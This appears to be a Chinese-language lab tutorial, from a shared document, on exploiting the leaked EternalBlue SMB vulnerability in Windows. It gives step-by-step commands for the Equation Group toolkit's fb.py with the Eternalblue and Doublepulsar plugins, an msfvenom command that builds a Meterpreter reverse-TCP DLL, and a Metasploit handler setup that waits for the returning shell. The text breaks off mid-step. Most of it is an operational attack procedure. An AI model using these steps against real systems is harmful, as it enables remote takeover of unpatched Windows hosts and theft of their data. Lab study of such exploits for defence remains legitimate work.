永恒之蓝3389漏洞原理详解.docxVIP

实验环境操作机：Windows XPIP?: 操作机：Kali LinuxIP?: 目标机：Windows 7 64位IP?: 目标机：Windows Server 2003IP?: 掌握工具的用法以及临时防御措施实验步骤实验工具Metasploit?：是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程等Equation Group Tools：这是一个集成的工具包，里面包含了IIS6.0、445端口、3389端口、Rootkit等远程利用工具，本次试验我们主要用到它的445端口远程入侵功能，以及3389远程端口入侵功能。实验内容Shadow Brokers再次暴露出一份震惊世界的机密文档，其中包含了多个Windows 远程漏洞利用工具，可以覆盖大量的 Windows 服务器，一夜之间所有Windows服务器几乎全线暴露在危险之中，任何人都可以直接下载并远程攻击利用，考虑到国内不少高校、政府、国企甚至还有一些互联网公司还在使用 Windows 服务器，这次事件影响力堪称网络大地震。影响版本全球 70% 的 Windows 服务器，包括Windows NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8，Windows 2008、Windows 2008 R2、Windows Server 2012 SP0危害攻击者通过执行脚本，使目标主机蓝屏重启，获取Windows目标主机权限，对目标机器进行任意操作，攻击成本和利用条件都很低，只需在本地执行脚本，并设置相关参数。一旦攻击成功，攻击者能直接控制目标主机，甚至直接下载数据库，盗取商业机密，很多的政府、事业单位都会受到影响，影响极大，危害不言而喻。步骤1：利用Eternalblue与Doublepulsar插件，验证445 SMB漏洞我们本步骤利用Eternalblue?和?Doublepulsar?这两个插件来获取Windows 7 64位的系统权限。其中Eternalblue可以利用SMB漏洞，获取Windows 7 系统权限而Doublepulsar可以加载Metasploit生成的恶意DLL。我们首先进入cmd命令行，在命令行中进入文件夹：cd C:\EQGRP_Lost_in_Translation-master/Windows输入命令：fb.py //运行python文件注：在一般情况下需要在工具根目录下创建listeningposts文件夹，否则运行文件时，会报错。接下来依次填入对应信息：//目标IP//本地IPno //取消重定向c:\logs //指定日志文件目录继续填入相关新信息：0//创建一个新项目Test_Win7 //项目名称Yes //确认路径到这里就完成了最基本的信息配置，正式启动了脚本，接下来继续进行配置，这时就要用到第一个插件了，使用命令：use Eternalblue//使用Eternalblue注意这里要选择操作系统、系统位数、传输方式，我们分别选择Windows 7、64位、FB传输方式，其他配置信息直接按回车键，保持默认即可。当看到Eternalblue Succeeded字样，代表成功。接下来需要用到Metasploit?，使用Everything搜索并使用XShell连接到Kali Linux：连接成功后，使用如下命令生成恶意DLL：msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=12399 -f dll win.dll这时，/home目录下就会生成win.dll文件，然后使用如下命令进入Metasploit，设置TCP监听端口，用于接受攻击成功后返回的Shell：msfconsoleuse exploit/multi/handler //使用监听模块set payload windows/x64/meterpreter/reverse_tcp//设置payloadshow options //查看配置信息set LHOST //设置本地IPset LPORT 12399//设置本地端口run //运行如图，Metasploit已经成功运行，等待Shell的返回。现在将之前生成的win.dll文件通过FTP复制到Windows机器上：首先点击下图中使用红色小框标示的图标：?本文中，我将dll文件放在C盘根目录：接下来使